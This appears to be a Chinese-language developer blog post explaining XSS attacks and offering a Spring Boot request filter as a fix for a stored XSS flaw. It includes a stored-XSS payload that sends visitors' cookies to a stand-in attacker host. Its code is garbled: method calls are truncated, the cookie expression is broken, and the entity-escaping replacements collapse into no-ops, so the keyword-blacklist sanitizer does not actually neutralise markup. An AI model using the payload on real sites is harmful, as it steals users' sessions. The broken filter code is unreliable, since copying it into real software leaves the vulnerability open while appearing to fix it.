XSS(跨站脚本攻击)及部分解决⽅案
最近做的部门内部⽤的⼀个⼩项⽬要上线,上线前安全测试测出了存储型XSS漏洞,⾃⼰也通过这个机会学习了⼀下,在此记录
1、什么是XSS
XSS的中⽂含义是跨站脚本攻击,Cross Site Scripting,缩写为CSS,但容易与层叠样式表的缩写混淆,所以有⼈将其缩写为XSS
2、XSS原理
html是超⽂本标记语⾔,通过⼀些字符特殊对待来区分⽂本和标记,例如:<;被看作html标签的开始,>被看作html标签的结束,那么
<title>与</title>之间的内容就会被看作是标题。如果动态页⾯中插⼊的内容包含这些特殊字符(如:<;等),⽤户浏览器就会将其误认为是html标签,如果被认为是html标签的内容中引⼊了⼀些js脚本,那么这些脚本就会在⽤户浏览器中执⾏,所以当这些特殊字符不能被动态界⾯检查或识别的时候,就会出现XSS漏洞。
3、XSS危害
1、窃取管理员帐号或Cookie,⼊侵者可以冒充管理员的⾝份登录后台。使得⼊侵者具有恶意操纵后台数据的能⼒,包括读取、更改、添加、删除⼀些信息。
2、窃取⽤户的个⼈信息或者登录帐号,对⽹站的⽤户安全产⽣巨⼤的威胁。例如冒充⽤户⾝份进⾏各种操作。
3、⽹站挂马。先将恶意攻击代码嵌⼊到Web应⽤程序之中。当⽤户浏览该挂马页⾯时,⽤户的计算机会被植⼊⽊马。
4、发送⼴告或者垃圾信息。攻击者可以利⽤XSS漏洞植⼊⼴告,或者发送垃圾信息,严重影响到⽤户的正常使⽤。
4、XSS分类
反射型XSS:攻击者通过向某URL中追加⾮法脚本(⾮法脚本其实就是通过⾮法字符构成的脚本)的⽅式,使得⽤户在访问此URL的时候会执⾏脚本内容,使得攻击者窃取到想要的数据。因为反射型XSS不会永久存储数据,只发⽣在⽤户⼀次访问过程中,所以有时也被叫
做“⾮持久型XSS”
例如:在url中追加<script>alert('你被攻击了!')</script>,那么⽤户在访问url的时候就会弹出'你被攻击了!',这只是很简单的模拟场景,真实攻击的时候并不会这么简单,⽽是在脚本中抓取⽤户数据等,造成信息泄露。
个⼈理解的反射型XSS流程图
存储型XSS:
也叫“持久型XSS”,攻击者通过页⾯中的输⼊信息输⼊⾮法字符,并通过浏览器传送到服务器,以数据形式永久存储⾄数据库中,⽤户每次访问此数据都会触发⾮法脚本,造成持久性的危害。
例如:在web平台中添加信息时,将信息的备注属性设置为
<a id='attacker'>点击就送百元现⾦</a>
<script>
'www.attacker_741/receiveCookies.html?'+kie;
</script>
之后点击添加,这段脚本就会作为备注存⼊⾄数据库中,之后每次访问相关的信息时,都会带着cookie信息跳转,造成持久性的攻击
存储型XSS流程与反射型XSS⼀样,区别在于存储型XSS会将⾮法脚本存⼊数据库,构成更加持久的危害。
DOM型XSS:
⼩⽩表⽰很迷.........
借鉴:DOM XSS是基于在js上的。⽽且他不需要与服务端进⾏交互,像反射、储蓄都需要服务端的反
馈来构造xss,因为服务端对我们是不可见的
5、存储型XSS攻击Java解决⽅案
我的项⽬被扫出的只有存储型XSS漏洞,所以我只做了存储型XSS的漏洞修复,其他的后期遇到会补充进来。
我在⽹上看了挺多修复的⽅式,可以前端通过正则验证⾮法字符,也可以后端通过过滤器处理HttpRequest中的特殊字符,我是后端,对于改前端多少有些排斥,所以选择了配置过滤器的⽅式才进⾏漏洞修复。Springboot项⽬中代码如下:
package com.web.filter;
import com.web.interceptor.XSSInterceptor;
import org.springframework.stereotype.Component;
import javax.servlet.*;
import javax.servlet.http.HttpServletRequest;
import java.io.IOException;
/**
* @author Peacock_
* @version 1.0
* @date 2019/12/25 14:47
* ⽤于避免存储型XSS漏洞
*/
@Component
public class XSSFilter implements Filter {
FilterConfig filterConfig = null;
@Override
replaceall()public void init(FilterConfig filterConfig) throws ServletException {
this.filterConfig = filterConfig;
}
@Override
public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) throws IOException, ServletException { filterChain.doFilter(new XSSInterceptor( (HttpServletRequest) servletRequest), servletResponse);
}
@Override
public void destroy() {
this.filterConfig = null;
}
}
package com.web.interceptor;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletRequestWrapper;
/**
* @author Peacock_
* @version 1.0
* @date 2019/12/25 14:51
* ⽤于处理特殊字符
*/
public class XSSInterceptor extends HttpServletRequestWrapper { public XSSInterceptor(HttpServletRequest request) {
super(request);
}
public String[] getParameterValues(String parameter) {
String[] values = ParameterValues(parameter);
if (values==null) {
return null;
}
int count = values.length;
String[] encodedValues = new String[count];
for (int i = 0; i < count; i++) {
encodedValues[i] = cleanXSS(values[i]);
}
return encodedValues;
}
public String getParameter(String parameter) {
String value = Parameter(parameter);
if (value == null) {
return null;
}
return cleanXSS(value);
}
public String getHeader(String name) {
String value = Header(name);
if (value == null)
return null;
return cleanXSS(value);
}
/**过滤规则
* 1、"script"替换为""
* 2、"<"替换为"<"
* 3、">"替换为">"
* 4、"iframe"替换为""
* @param value
* @return
*/
private String cleanXSS(String value) {
value = placeAll("<", "<").replaceAll(">", ">");
value = placeAll("script", " ");
value = placeAll("iframe", " ");
value = placeAll("[\\\"\\\'][\\s]*javascript:(.*)[\\\"\\\']", "\"\""); return value;
}
}
版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系QQ:729038198,我们将在24小时内删除。
发表评论